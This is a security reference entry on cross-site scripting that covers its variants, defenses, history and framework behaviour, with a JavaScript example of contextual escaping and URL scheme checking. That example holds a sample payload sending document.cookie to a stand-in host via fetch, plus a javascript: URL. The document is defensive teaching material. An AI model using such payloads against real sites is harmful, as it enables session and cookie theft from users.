Security also: Cross-Site Scripting

XSS

Injecting attacker-controlled JavaScript into a page so that the victim's browser runs it with that page's origin, and therefore with the victim's cookies, storage and DOM.


In plain terms

Three variants: stored (the payload is persisted server-side and served to every visitor), reflected (the payload is echoed back from the current request), and DOM-based (client-side code writes untrusted data into a dangerous sink such as innerHTML). Defenses: contextual escaping of every untrusted value for the context it lands in (HTML text, attribute, URL, JavaScript), a strict Content Security Policy, and framework-level auto-escape (React, Svelte).
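
Contextual escaping in practice, as an added example that is not part of the original page: the same untrusted string needs a different treatment depending on whether it lands in HTML text, an attribute, or a URL, and an HTML encoder alone will not stop a javascript: URL. The attacker values, the helper names (escapeHtml, safeHref, renderProfile, containsScript) and the scheme allow-list are constructed for this illustration.

```javascript
// Added example, not code from the original page: contextual output encoding.
// Constructed attacker input, as it might sit in a stored profile record.
const ATTACKER_NAME = '"><script>fetch("//evil.test/?c=" + document.cookie)</script>';
const ATTACKER_URL = 'javascript:alert(document.domain)';

// HTML-body and double-quoted-attribute context: neutralise the HTML metacharacters.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// URL context: escapeHtml leaves 'javascript:alert(1)' untouched, so an href
// additionally needs a scheme allow-list (assumed here: http, https, mailto).
// Browsers ignore ASCII control characters and whitespace inside the scheme,
// so "java\tscript:" must be normalised before the check.
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);
function safeHref(url) {
  const raw = String(url).trim();
  const probe = raw.replace(/[\u0000-\u0020\u007F]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(probe);
  if (m && !SAFE_SCHEMES.has(m[1].toLowerCase())) return 'about:blank';
  return raw; // relative URLs and allow-listed schemes pass through unchanged
}

// Vulnerable: untrusted values concatenated straight into markup.
function renderProfileUnsafe(name, site) {
  return `<a href="${site}" title="${name}">${name}</a>`;
}

// Hardened: every interpolation goes through the encoder for its context,
// and the href is scheme-checked before being attribute-encoded.
function renderProfile(name, site) {
  const n = escapeHtml(name);
  return `<a href="${escapeHtml(safeHref(site))}" title="${n}">${n}</a>`;
}

// Rough indicator used only by this example (not an XSS detector): does the
// output contain a live <script> element or a javascript: href?
function containsScript(html) {
  return /<script[\s>]/i.test(html) || /href="\s*javascript:/i.test(html);
}
```

With the constructed input, renderProfileUnsafe produces a page that both closes the title attribute to start a script element and carries a javascript: link; renderProfile produces inert text and an about:blank href. Note that safeHref passes protocol-relative URLs (//host/path) unchanged, which is acceptable for a link but not for a script or frame source.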

Origin

The term was coined by Microsoft security engineers in January 2000. The Samy worm of October 2005 used a stored XSS flaw on MySpace to add itself to over a million profiles in about 20 hours. XSS was ranked #1 in the 2007 OWASP Top 10, fell to #2 in 2010, #3 in 2013 and #7 in 2017, and was folded into the Injection category in 2021.

Where it shows up in production
  • React, Svelte, Vue: auto-escape every interpolated string by default. The explicit opt-outs (dangerouslySetInnerHTML in React, {@html} in Svelte, v-html in Vue) are where code review should look. Auto-escaping covers text and attribute values only; a javascript: URL bound to an href still needs a scheme check.
  • Strict CSP: a nonce-based policy (script-src 'nonce-<random>' 'strict-dynamic'; object-src 'none'; base-uri 'none') renders most classical XSS payloads inert even when the injection bug exists, because injected inline scripts and event handlers carry no valid nonce. The price is moving every legitimate inline script into a nonced tag, and it does not stop markup-only attacks such as injected forms or dangling-markup exfiltration.